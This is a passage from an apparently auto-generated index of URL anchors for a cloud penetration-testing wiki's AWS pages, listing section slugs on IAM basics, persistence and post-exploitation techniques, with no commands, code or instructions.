s-security/index.html#recon","pentesting-cloud/aws-security/index.html#privesc--exploiting","pentesting-cloud/aws-security/index.html#audit","pentesting-cloud/aws-security/index.html#constant-audit","pentesting-cloud/aws-security/index.html#debug-capture-aws-cli-requests","pentesting-cloud/aws-security/index.html#references","pentesting-cloud/aws-security/aws-basic-information/index.html#aws---basic-information","pentesting-cloud/aws-security/aws-basic-information/index.html#organization-hierarchy","pentesting-cloud/aws-security/aws-basic-information/index.html#accounts","pentesting-cloud/aws-security/aws-basic-information/index.html#organization-units","pentesting-cloud/aws-security/aws-basic-information/index.html#service-control-policy-scp","pentesting-cloud/aws-security/aws-basic-information/index.html#resource-control-policy-rcp","pentesting-cloud/aws-security/aws-basic-information/index.html#arn","pentesting-cloud/aws-security/aws-basic-information/index.html#iam---identity-and-access-management","pentesting-cloud/aws-security/aws-basic-information/index.html#aws-account-root-user","pentesting-cloud/aws-security/aws-basic-information/index.html#iam-users","pentesting-cloud/aws-security/aws-basic-information/index.html#mfa---multi-factor-authentication","pentesting-cloud/aws-security/aws-basic-information/index.html#iam-user-groups","pentesting-cloud/aws-security/aws-basic-information/index.html#iam-roles","pentesting-cloud/aws-security/aws-basic-information/index.html#temporary-credentials-in-iam","pentesting-cloud/aws-security/aws-basic-information/index.html#policies","pentesting-cloud/aws-security/aws-basic-information/index.html#iam-boundaries","pentesting-cloud/aws-security/aws-basic-information/index.html#session-policies","pentesting-cloud/aws-security/aws-basic-information/index.html#identity-federation","pentesting-cloud/aws-security/aws-basic-information/index.html#iam-identity-center","pentesting-cloud/aws-security/aws-basic-information/index.html#cross-account-trusts-and-roles","pentesting-cloud/aws-security/aws-basic-information/index.html#aws-simple-ad","pentesting-cloud/aws-security/aws-basic-information/index.html#other-iam-options","pentesting-cloud/aws-security/aws-basic-information/index.html#iam-id-prefixes","pentesting-cloud/aws-security/aws-basic-information/index.html#recommended-permissions-to-audit-accounts","pentesting-cloud/aws-security/aws-basic-information/index.html#misc","pentesting-cloud/aws-security/aws-basic-information/index.html#cli-authentication","pentesting-cloud/aws-security/aws-basic-information/index.html#references","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#aws---federation-abuse","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#saml","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#oidc---github-actions-abuse","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#oidc---eks-abuse","pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.html#references","pentesting-cloud/aws-security/aws-permissions-for-a-pentest.html#aws---permissions-for-a-pentest","pentesting-cloud/aws-security/aws-persistence/index.html#aws---persistence","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#aws---api-gateway-persistence","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#api-gateway","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#resource-policy","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#modify-lambda-authorizers","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#iam-permissions","pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.html#api-keys","pentesting-cloud/aws-security/aws-persistence/aws-cloudformation-persistence.html#aws---cloudformation-persistence","pentesting-cloud/aws-security/aws-persistence/aws-cloudformation-persistence.html#cloudformation","pentesting-cloud/aws-security/aws-persistence/aws-cloudformation-persistence.html#cdk-bootstrap-stack","pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.html#aws---cognito-persistence","pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.html#cognito","pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.html#user-persistence","pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.html#cognito-idpsetriskconfiguration","pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.html#aws---dynamodb-persistence","pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.html#dynamodb","pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.html#dynamodb-triggers-with-lambda-backdoor","pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.html#dynamodb-as-a-c2-channel","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#aws---ec2-persistence","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#ec2","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#security-group-connection-tracking-persistence","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#ec2-lifecycle-manager","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#scheduled-instances","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#spot-fleet-request","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#backdoor-instances","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#backdoor-launch-configuration","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#vpn","pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.html#vpc-peering","pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.html#aws---ecr-persistence","pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.html#ecr","pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.html#hidden-docker-image-with-malicious-code","pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.html#repository-policy","pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.html#registry-policy--cross-account-replication","pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.html#aws---ecs-persistence","pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.html#ecs","pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.html#hidden-periodic-ecs-task","pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.html#backdoor-container-in-existing-ecs-task-definition","pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.html#undocumented-ecs-service","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#aws---elastic-beanstalk-persistence","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#elastic-beanstalk","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#persistence-in-instance","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#backdoor-in-version","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#new-backdoored-version","pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.html#abusing-custom-resource-lifecycle-hooks","pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.html#aws---efs-persistence","pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.html#efs","pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.html#modify-resource-policy--security-groups","pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.html#create-access-point","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#aws---iam-persistence","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#iam","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#common-iam-persistence","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#backdoor-role-trust-policies","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#backdoor-policy-version","pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.html#backdoor--create-identity-provider","pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.html#aws---kms-persistence","pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.html#kms","pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.html#grant-acces-via-kms-policies","pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.html#eternal-grant","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#aws---lambda-persistence","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#lambda","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#lambda-layer-persistence","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#lambda-extension-persistence","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#via-resource-policies","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#versions-aliases--weights","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#version-backdoor--api-gateway","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/index.html#cronevent-actuator","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.html#aws---abusing-lambda-extensions","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.html#lambda-extensions","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.html#external-extension-for-persistence-stealing-requests--modifying-requests","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.html#references","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#aws---lambda-layers-persistence","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#lambda-layers","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#python-load-path","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#preloaded-libraries","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#lambda-layer-backdooring","pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.html#external-layers","pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.html#aws---lightsail-persistence","pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.html#lightsail","pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.html#download-instance-ssh-keys--db-passwords","pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.html#backdoor-instances","pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.html#dns-persistence","pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.html#aws---rds-persistence","pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.html#rds","pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.html#make-instance-publicly-accessible-rdsmodifydbinstance","pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.html#create-an-admin-user-inside-the-db","pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.html#make-snapshot-public","pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.html#aws---s3-persistence","pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.html#s3","pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.html#kms-client-side-encryption","pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.html#using-s3-acls","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#aws-sagemaker-persistence","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#overview-of-persistence-techniques","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#required-permissions","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#set-lifecycle-configuration-on-notebook-instances","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#example-aws-cli-commands","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#set-lifecycle-configuration-on-sagemaker-studio","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#studio-domain-level-all-users","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#studio-space-level-individual-or-shared-spaces","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#types-of-studio-application-lifecycle-configurations","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#example-command-for-each-type","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#jupyterserver","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#kernelgateway","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#codeeditor","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#critical-info","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#reverse-shell-via-lifecycle-configuration","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#payload-example","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#cron-job-persistence-via-lifecycle-configuration","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#payload-example-1","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#credential-exfiltration-via-imds-v1--v2","pentesting-cloud/aws-security/aws-persistence/aws-sagemaker-persistence.html#payload-example-2","pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.html#aws---sns-persistence","pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.html#sns","pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.html#persistence","pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.html#create-subscribers","pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.html#aws---secrets-manager-persistence","pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.html#secrets-manager","pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.html#via-resource-policies","pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.html#via-secrets-rotate-lambda","pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.html#aws---sqs-persistence","pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.html#sqs","pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.html#using-resource-policy","pentesting-cloud/aws-security/aws-persistence/aws-ssm-persistence.html#aws---ssm-perssitence","pentesting-cloud/aws-security/aws-persistence/aws-ssm-persistence.html#ssm","pentesting-cloud/aws-security/aws-persistence/aws-ssm-persistence.html#using-ssmcreateassociation-for-persistence","pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.html#aws---step-functions-persistence","pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.html#step-functions","pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.html#step-function-backdooring","pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.html#backdooring-aliases","pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.html#aws---sts-persistence","pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.html#sts","pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.html#assume-role-token","pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.html#role-chain-juggling","pentesting-cloud/aws-security/aws-post-exploitation/index.html#aws---post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#aws---api-gateway-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#api-gateway","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#access-unexposed-apis","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#bypass-request-body-passthrough","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#usage-plans-dos","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#apigatewayupdategatewayresponse-apigatewaycreatedeployment","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#apigatewayupdatestage-apigatewaycreatedeployment","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#apigatewayputmethodresponse-apigatewaycreatedeployment","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#apigatewayupdaterestapi-apigatewaycreatedeployment","pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.html#apigatewaycreateapikey-apigatewayupdateapikey-apigatewaycreateusageplan-apigatewaycreateusageplankey","pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.html#aws---cloudfront-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.html#cloudfront","pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.html#man-in-the-middle","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#aws---codebuild-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#codebuild","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#check-secrets","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#abuse-codebuild-repo-access","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#leaking-access-tokens-from-aws-codebuild","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#codebuilddeleteproject","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#codebuildtagresource--codebuilduntagresource","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/index.html#codebuilddeletesourcecredentials","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.html#aws-codebuild---token-leakage","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.html#recover-githubbitbucket-configured-tokens","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.html#via-docker-image","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.html#via-insecuressl","pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.html#via-http-protocol","pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.html#aws---control-tower-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.html#control-tower","pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.html#enable--disable-controls","pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.html#aws---dlm-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.html#data-lifecycle-manger-dlm","pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.html#ec2describevolumes-dlmcreatelifecyclepolicy","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#aws---dynamodb-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodb","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbbatchgetitem","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbgetitem","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbquery","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbscan","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbpartiqlselect","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbexporttabletopointintimedynamodbupdatecontinuousbackups","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbcreatetable-dynamodbrestoretablefrombackup-dynamodbcreatebackup","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbputitem","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbupdateitem","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbdeletetable","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbdeletebackup","pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.html#dynamodbstreamspecification-dynamodbupdatetable-dynamodbdescribestream-dynamodbgetsharditerator-dynamodbgetrecords","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#aws---ec2-ebs-ssm--vpc-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#ec2--vpc","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#malicious-vpc-mirror----ec2describeinstances-ec2runinstances-ec2createsecuritygroup-ec2authorizesecuritygroupingress-ec2createtrafficmirrortarget-ec2createtrafficmirrorsession-ec2createtrafficmirrorfilter-ec2createtrafficmirrorfilterrule","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#copy-running-instance","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#ebs-snapshot-dump","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#data-exfiltration","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#open-security-group","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#privesc-to-ecs","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#remove-vpc-flow-logs","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#ssm-port-forwarding","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#share-ami","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#search-sensitive-information-in-public-and-private-amis","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#share-ebs-snapshot","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#ebs-ransomware-poc","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/index.html#references","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#aws---ebs-snapshot-dump","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#checking-a-snapshot-locally","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#checking-a-snapshot-in-aws","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#checking-a-snapshot-in-aws-using-cli","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#shadow-copy","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.html#references","pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.html#aws---malicious-vpc-mirror","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.html#aws---ecr-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.html#ecr","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.html#login-pull--push","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.html#ecrputlifecyclepolicy--ecrdeleterepository--ecr-publicdeleterepository--ecrbatchdeleteimage--ecr-publicbatchdeleteimage","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.html#aws---ecs-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.html#ecs","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.html#host-iam-roles","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.html#privesc-to-node-to-steal-other-containers-creds--secrets","pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.html#steal-sensitive-info-from-ecr-containers","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#aws---efs-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#efs","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#elasticfilesystemdeletemounttarget","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#elasticfilesystemdeletefilesystem","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#elasticfilesystemupdatefilesystem","pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.html#elasticfilesystemcreateaccesspoint-and-elasticfilesystemdeleteaccesspoint","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#aws---eks-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#eks","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#enumerate-the-cluster-from-the-aws-console","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#connect-to-aws-kubernetes-cluster","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#from-aws-to-kubernetes","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#from-kubernetes-to-aws","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#get-api-server-endpoint-from-a-jwt-token","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#bypass-cloudtrail","pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.html#eks-ransom","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#aws---elastic-beanstalk-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elastic-beanstalk","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elasticbeanstalkdeleteapplicationversion","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elasticbeanstalkterminateenvironment","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elasticbeanstalkdeleteapplication","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elasticbeanstalkswapenvironmentcnames","pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.html#elasticbeanstalkaddtags-elasticbeanstalkremovetags","pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.html#aws---iam-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.html#iam","pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.html#confused-deputy-problem","pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.html#unexpected-trusts","pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.html#references","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#aws---kms-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#kms","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#encryptdecrypt-information","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#kms-ransomware","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#generic-kms-ransomware","pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.html#destroy-keys","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/index.html#aws---lambda-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/index.html#lambda","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/index.html#exfilrtate-lambda-credentials","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/index.html#steal-others-lambda-url-requests","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/index.html#steal-others-lambda-url-requests--extensions-requests","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.html#aws---steal-lambda-requests","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.html#lambda-flow","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.html#stealing-lambda-requests","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.html#attack-steps","pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.html#references","pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.html#aws---lightsail-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.html#lightsail","pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.html#restore-old-db-snapshots","pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.html#restore-instance-snapshots","pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.html#access-sensitive-information","pentesting-cloud/aws-security/aws-p